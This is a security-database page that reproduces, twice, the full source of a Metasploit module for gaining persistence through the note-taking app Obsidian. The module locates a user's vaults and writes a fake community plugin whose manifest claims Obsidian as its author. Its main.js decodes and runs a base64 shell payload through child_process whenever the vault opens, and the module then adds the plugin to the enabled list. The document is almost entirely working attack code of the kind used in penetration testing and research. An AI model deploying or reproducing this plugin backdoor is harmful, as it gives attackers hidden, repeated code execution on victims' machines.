Obsidian Plugin Persistence_MSF:EXPLOIT-MULTI-PERSISTENCE-OBSIDIAN_PLUGIN-

Description

This module searches for Obsidian vaults for a user, and uploads a malicious community plugin to the vault. The vaults must be opened with community ...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-MULTI-PERSISTENCE-OBSIDIAN_PLUGIN-

Published Sep 16, 2025 at 18:53

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Unix # whoami
include Msf::Auxiliary::Report
include Msf::Exploit::Local::Persistence
include Msf::Exploit::Deprecated
moved_from 'exploits/multi/local/obsidian_plugin_persistence'

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Obsidian Plugin Persistence',
'Description' => %q{
This module searches for Obsidian vaults for a user, and uploads a malicious
community plugin to the vault. The vaults must be opened with community
plugins enabled (NOT restricted mode), but the plugin will be enabled
automatically.

Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # Module
'Thomas Byrne' # Research, PoC
],
'DisclosureDate' => '2022-09-16',
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Privileged' => false,
'References' => [
[ 'URL', 'https://docs.obsidian.md/Plugins/Getting+started/Build+a+plugin' ],
[ 'URL', 'https://github.com/obsidianmd/obsidian-sample-plugin/tree/master' ],
[ 'URL', 'https://forum.obsidian.md/t/can-obsidian-plugins-have-malware/34491' ],
[ 'URL', 'https://help.obsidian.md/Extending+Obsidian/Plugin+security' ],
[ 'URL', 'https://thomas-byrne.co.uk/research/obsidian-malicious-plugins/obsidian-research/' ]
],
'Arch' => [ARCH_CMD],
'Platform' => %w[osx linux windows],
'DefaultOptions' => {
'PrependMigrate' => true
},
'Payload' => {
'BadChars' => '"'
},
'Targets' => [
['Auto', {} ],
['Linux', { 'Platform' => 'unix' } ],
['OSX', { 'Platform' => 'osx' } ],
['Windows', { 'Platform' => 'windows' } ],
],
'Notes' => {
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]
},
'DefaultTarget' => 0
)
)

register_options([
OptString.new('NAME', [ false, 'Name of the plugin', '' ]),
OptString.new('USER', [ false, 'User to target, or current user if blank', '' ]),
OptString.new('CONFIG', [ false, 'Config file location on target', '' ]),
])
deregister_options('WritableDir')
end

def plugin_name
return datastore['NAME'] unless datastore['NAME'].blank?

rand_text_alphanumeric(4..10)
end

def find_vaults
vaults_found = []
user = target_user
vprint_status("Target User: #{user}")
case session.platform
when 'windows', 'win'
config_files = ["C:\\Users\\#{user}\\AppData\\Roaming\\obsidian\\obsidian.json"]
when 'osx'
config_files = ["/User/#{user}/Library/Application Support/obsidian/obsidian.json"]
when 'linux'
config_files = [
"/home/#{user}/.config/obsidian/obsidian.json",
"/home/#{user}/snap/obsidian/40/.config/obsidian/obsidian.json"
] # snap package
end

config_files << datastore['CONFIG'] unless datastore['CONFIG'].empty?

config_files.each do |config_file|
next unless file?(config_file)

vprint_status("Found user obsidian file: #{config_file}")
config_contents = read_file(config_file)
return fail_with(Failure::Unknown, 'Failed to read config file') if config_contents.nil?

begin
vaults = JSON.parse(config_contents)
rescue JSON::ParserError
vprint_error("Failed to parse JSON from #{config_file}")
next
end

vaults_found = vaults['vaults']
if vaults_found.nil?
vprint_error("No vaults found in #{config_file}")
next
end

vaults['vaults'].each do |k, v|
if v['open']
print_good("Found #{v['open'] ? 'open' : 'closed'} vault #{k}: #{v['path']}")
else
print_status("Found #{v['open'] ? 'open' : 'closed'} vault #{k}: #{v['path']}")
end
end
end

vaults_found
end

def manifest_js(plugin_name)
JSON.pretty_generate({
'id' => plugin_name.gsub(' ', '_'),
'name' => plugin_name,
'version' => '1.0.0',
'minAppVersion' => '0.15.0',
'description' => '',
'author' => 'Obsidian',
'authorUrl' => 'https://obsidian.md',
'isDesktopOnly' => false
})
end

def main_js(_plugin_name)
if ['windows', 'win'].include? session.platform
payload_stub = payload.encoded.to_s
else
payload_stub = "echo \\\"#{Rex::Text.encode_base64(payload.encoded)}\\\" | base64 -d | /bin/sh"
end
%%
/*
THIS IS A GENERATED/BUNDLED FILE BY ESBUILD
if you want to view the source, please visit the github repository of this plugin
*/

var __defProp = Object.defineProperty;
var __getOwnPropDesc = Object.getOwnPropertyDescriptor;
var __getOwnPropNames = Object.getOwnPropertyNames;
var __hasOwnProp = Object.prototype.hasOwnProperty;
var __export = (target, all) => {
for (var name in all)
__defProp(target, name, { get: all[name], enumerable: true });
};
var __copyProps = (to, from, except, desc) => {
if (from && typeof from === "object" || typeof from === "function") {
for (let key of __getOwnPropNames(from))
if (!__hasOwnProp.call(to, key) && key !== except)
__defProp(to, key, { get: () => from[key], enumerable: !(desc = __getOwnPropDesc(from, key)) || desc.enumerable });
}
return to;
};
var __toCommonJS = (mod) => __copyProps(__defProp({}, "__esModule", { value: true }), mod);

// main.ts
var main_exports = {};
__export(main_exports, {
default: () => ExamplePlugin
});
module.exports = __toCommonJS(main_exports);
var import_obsidian = require("obsidian");
var ExamplePlugin = class extends import_obsidian.Plugin {
async onload() {
var command = "#{payload_stub}";
const { exec } = require("child_process");
exec(command, (error, stdout, stderr) => {
if (error) {
console.log(`error: ${error.message}`);
return;
}
if (stderr) {
console.log(`stderr: ${stderr}`);
return;
}
console.log(`stdout: ${stdout}`);
});
}
async onunload() {
}
};
%
end

def target_user
return datastore['USER'] unless datastore['USER'].blank?

return cmd_exec('cmd.exe /c echo %USERNAME%').strip if ['windows', 'win'].include? session.platform

whoami
end

def check
return CheckCode::Appears('Vaults found') unless find_vaults.empty?

CheckCode::Safe('No vaults found')
end

def install_persistence
plugin = plugin_name
print_status("Using plugin name: #{plugin}")
vaults = find_vaults
fail_with(Failure::NotFound, 'No vaults found') if vaults.empty?
vaults.each_value do |vault|
print_status("Uploading plugin to vault #{vault['path']}")
# avoid mkdir function because that registers it for delete, and we don't want that for
# persistent modules
if ['windows', 'win'].include? session.platform
cmd_exec("cmd.exe /c md \"#{vault['path']}\\.obsidian\\plugins\\#{plugin}\"")
else
cmd_exec("mkdir -p '#{vault['path']}/.obsidian/plugins/#{plugin}/'")
end
vprint_status("Uploading: #{vault['path']}/.obsidian/plugins/#{plugin}/main.js")
write_file("#{vault['path']}/.obsidian/plugins/#{plugin}/main.js", main_js(plugin))
@clean_up_rc << "rm #{vault['path']}/.obsidian/plugins/#{plugin}/main.js\n"

vprint_status("Uploading: #{vault['path']}/.obsidian/plugins/#{plugin}/manifest.json")
write_file("#{vault['path']}/.obsidian/plugins/#{plugin}/manifest.json", manifest_js(plugin))
@clean_up_rc << "rm #{vault['path']}/.obsidian/plugins/#{plugin}/manifest.json\n"
# read in the enabled community plugins, and add ours to the enabled list
if file?("#{vault['path']}/.obsidian/community-plugins.json")
plugins = read_file("#{vault['path']}/.obsidian/community-plugins.json")
begin
plugins = JSON.parse(plugins)
vprint_status("Found #{plugins.length} enabled community plugins (#{plugins.join(', ')})")
path = store_loot('obsidian.community.plugins.json', 'text/plain', session, plugins, nil, nil)
print_good("Config file saved in: #{path}")
@clean_up_rc << "upload #{path} #{vault['path']}/.obsidian/community-plugins.json\n"
rescue JSON::ParserError
plugins = []
end

plugins << plugin unless plugins.include?(plugin)
else
plugins = [plugin]
end
vprint_status("adding #{plugin} to the enabled community plugins list")
write_file("#{vault['path']}/.obsidian/community-plugins.json", JSON.pretty_generate(plugins))
print_good('Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.')
end
end
end

{
    "lastseen": "2025-09-16T19:07:36",
    "description": "This module searches for Obsidian vaults for a user, and uploads a malicious           community plugin to the vault. The vaults must be opened with community       ...",
    "published": "2025-09-16T18:53:38",
    "modified": "2025-09-16T18:53:38",
    "type": "metasploit",
    "title": "Obsidian Plugin Persistence",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-MULTI-PERSISTENCE-OBSIDIAN_PLUGIN-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n  Rank = ExcellentRanking\n\n  include Msf::Post::File\n  include Msf::Post::Unix # whoami\n  include Msf::Auxiliary::Report\n  include Msf::Exploit::Local::Persistence\n  include Msf::Exploit::Deprecated\n  moved_from 'exploits/multi/local/obsidian_plugin_persistence'\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Obsidian Plugin Persistence',\n        'Description' => %q{\n          This module searches for Obsidian vaults for a user, and uploads a malicious\n          community plugin to the vault. The vaults must be opened with community\n          plugins enabled (NOT restricted mode), but the plugin will be enabled\n          automatically.\n\n          Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'h00die', # Module\n          'Thomas Byrne' # Research, PoC\n        ],\n        'DisclosureDate' => '2022-09-16',\n        'SessionTypes' => [ 'shell', 'meterpreter' ],\n        'Privileged' => false,\n        'References' => [\n          [ 'URL', 'https://docs.obsidian.md/Plugins/Getting+started/Build+a+plugin' ],\n          [ 'URL', 'https://github.com/obsidianmd/obsidian-sample-plugin/tree/master' ],\n          [ 'URL', 'https://forum.obsidian.md/t/can-obsidian-plugins-have-malware/34491' ],\n          [ 'URL', 'https://help.obsidian.md/Extending+Obsidian/Plugin+security' ],\n          [ 'URL', 'https://thomas-byrne.co.uk/research/obsidian-malicious-plugins/obsidian-research/' ]\n        ],\n        'Arch' => [ARCH_CMD],\n        'Platform' => %w[osx linux windows],\n        'DefaultOptions' => {\n          'PrependMigrate' => true\n        },\n        'Payload' => {\n          'BadChars' => '\"'\n        },\n        'Targets' => [\n          ['Auto', {} ],\n          ['Linux', { 'Platform' => 'unix' } ],\n          ['OSX', { 'Platform' => 'osx' } ],\n          ['Windows', { 'Platform' => 'windows' } ],\n        ],\n        'Notes' => {\n          'Reliability' => [ REPEATABLE_SESSION ],\n          'Stability' => [ CRASH_SAFE ],\n          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]\n        },\n        'DefaultTarget' => 0\n      )\n    )\n\n    register_options([\n      OptString.new('NAME', [ false, 'Name of the plugin', '' ]),\n      OptString.new('USER', [ false, 'User to target, or current user if blank', '' ]),\n      OptString.new('CONFIG', [ false, 'Config file location on target', '' ]),\n    ])\n    deregister_options('WritableDir')\n  end\n\n  def plugin_name\n    return datastore['NAME'] unless datastore['NAME'].blank?\n\n    rand_text_alphanumeric(4..10)\n  end\n\n  def find_vaults\n    vaults_found = []\n    user = target_user\n    vprint_status(\"Target User: #{user}\")\n    case session.platform\n    when 'windows', 'win'\n      config_files = [\"C:\\\\Users\\\\#{user}\\\\AppData\\\\Roaming\\\\obsidian\\\\obsidian.json\"]\n    when 'osx'\n      config_files = [\"/User/#{user}/Library/Application Support/obsidian/obsidian.json\"]\n    when 'linux'\n      config_files = [\n        \"/home/#{user}/.config/obsidian/obsidian.json\",\n        \"/home/#{user}/snap/obsidian/40/.config/obsidian/obsidian.json\"\n      ] # snap package\n    end\n\n    config_files << datastore['CONFIG'] unless datastore['CONFIG'].empty?\n\n    config_files.each do |config_file|\n      next unless file?(config_file)\n\n      vprint_status(\"Found user obsidian file: #{config_file}\")\n      config_contents = read_file(config_file)\n      return fail_with(Failure::Unknown, 'Failed to read config file') if config_contents.nil?\n\n      begin\n        vaults = JSON.parse(config_contents)\n      rescue JSON::ParserError\n        vprint_error(\"Failed to parse JSON from #{config_file}\")\n        next\n      end\n\n      vaults_found = vaults['vaults']\n      if vaults_found.nil?\n        vprint_error(\"No vaults found in #{config_file}\")\n        next\n      end\n\n      vaults['vaults'].each do |k, v|\n        if v['open']\n          print_good(\"Found #{v['open'] ? 'open' : 'closed'} vault #{k}: #{v['path']}\")\n        else\n          print_status(\"Found #{v['open'] ? 'open' : 'closed'} vault #{k}: #{v['path']}\")\n        end\n      end\n    end\n\n    vaults_found\n  end\n\n  def manifest_js(plugin_name)\n    JSON.pretty_generate({\n      'id' => plugin_name.gsub(' ', '_'),\n      'name' => plugin_name,\n      'version' => '1.0.0',\n      'minAppVersion' => '0.15.0',\n      'description' => '',\n      'author' => 'Obsidian',\n      'authorUrl' => 'https://obsidian.md',\n      'isDesktopOnly' => false\n    })\n  end\n\n  def main_js(_plugin_name)\n    if ['windows', 'win'].include? session.platform\n      payload_stub = payload.encoded.to_s\n    else\n      payload_stub = \"echo \\\\\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\\\\\" | base64 -d | /bin/sh\"\n    end\n    %%\n/*\nTHIS IS A GENERATED/BUNDLED FILE BY ESBUILD\nif you want to view the source, please visit the github repository of this plugin\n*/\n\nvar __defProp = Object.defineProperty;\nvar __getOwnPropDesc = Object.getOwnPropertyDescriptor;\nvar __getOwnPropNames = Object.getOwnPropertyNames;\nvar __hasOwnProp = Object.prototype.hasOwnProperty;\nvar __export = (target, all) => {\n  for (var name in all)\n    __defProp(target, name, { get: all[name], enumerable: true });\n};\nvar __copyProps = (to, from, except, desc) => {\n  if (from && typeof from === \"object\" || typeof from === \"function\") {\n    for (let key of __getOwnPropNames(from))\n      if (!__hasOwnProp.call(to, key) && key !== except)\n        __defProp(to, key, { get: () => from[key], enumerable: !(desc = __getOwnPropDesc(from, key)) || desc.enumerable });\n  }\n  return to;\n};\nvar __toCommonJS = (mod) => __copyProps(__defProp({}, \"__esModule\", { value: true }), mod);\n\n// main.ts\nvar main_exports = {};\n__export(main_exports, {\n  default: () => ExamplePlugin\n});\nmodule.exports = __toCommonJS(main_exports);\nvar import_obsidian = require(\"obsidian\");\nvar ExamplePlugin = class extends import_obsidian.Plugin {\n  async onload() {\n        var command = \"#{payload_stub}\";\n        const { exec } = require(\"child_process\");\n        exec(command, (error, stdout, stderr) => {\n            if (error) {\n                console.log(`error: ${error.message}`);\n                return;\n            }\n            if (stderr) {\n                console.log(`stderr: ${stderr}`);\n                return;\n            }\n            console.log(`stdout: ${stdout}`);\n        });\n  }\n  async onunload() {\n  }\n};\n%\n  end\n\n  def target_user\n    return datastore['USER'] unless datastore['USER'].blank?\n\n    return cmd_exec('cmd.exe /c echo %USERNAME%').strip if ['windows', 'win'].include? session.platform\n\n    whoami\n  end\n\n  def check\n    return CheckCode::Appears('Vaults found') unless find_vaults.empty?\n\n    CheckCode::Safe('No vaults found')\n  end\n\n  def install_persistence\n    plugin = plugin_name\n    print_status(\"Using plugin name: #{plugin}\")\n    vaults = find_vaults\n    fail_with(Failure::NotFound, 'No vaults found') if vaults.empty?\n    vaults.each_value do |vault|\n      print_status(\"Uploading plugin to vault #{vault['path']}\")\n      # avoid mkdir function because that registers it for delete, and we don't want that for\n      # persistent modules\n      if ['windows', 'win'].include? session.platform\n        cmd_exec(\"cmd.exe /c md \\\"#{vault['path']}\\\\.obsidian\\\\plugins\\\\#{plugin}\\\"\")\n      else\n        cmd_exec(\"mkdir -p '#{vault['path']}/.obsidian/plugins/#{plugin}/'\")\n      end\n      vprint_status(\"Uploading: #{vault['path']}/.obsidian/plugins/#{plugin}/main.js\")\n      write_file(\"#{vault['path']}/.obsidian/plugins/#{plugin}/main.js\", main_js(plugin))\n      @clean_up_rc << \"rm #{vault['path']}/.obsidian/plugins/#{plugin}/main.js\\n\"\n\n      vprint_status(\"Uploading: #{vault['path']}/.obsidian/plugins/#{plugin}/manifest.json\")\n      write_file(\"#{vault['path']}/.obsidian/plugins/#{plugin}/manifest.json\", manifest_js(plugin))\n      @clean_up_rc << \"rm #{vault['path']}/.obsidian/plugins/#{plugin}/manifest.json\\n\"\n      # read in the enabled community plugins, and add ours to the enabled list\n      if file?(\"#{vault['path']}/.obsidian/community-plugins.json\")\n        plugins = read_file(\"#{vault['path']}/.obsidian/community-plugins.json\")\n        begin\n          plugins = JSON.parse(plugins)\n          vprint_status(\"Found #{plugins.length} enabled community plugins (#{plugins.join(', ')})\")\n          path = store_loot('obsidian.community.plugins.json', 'text/plain', session, plugins, nil, nil)\n          print_good(\"Config file saved in: #{path}\")\n          @clean_up_rc << \"upload #{path} #{vault['path']}/.obsidian/community-plugins.json\\n\"\n        rescue JSON::ParserError\n          plugins = []\n        end\n\n        plugins << plugin unless plugins.include?(plugin)\n      else\n        plugins = [plugin]\n      end\n      vprint_status(\"adding #{plugin} to the enabled community plugins list\")\n      write_file(\"#{vault['path']}/.obsidian/community-plugins.json\", JSON.pretty_generate(plugins))\n      print_good('Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.')\n    end\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/persistence/obsidian_plugin.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/multi/persistence/obsidian_plugin/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply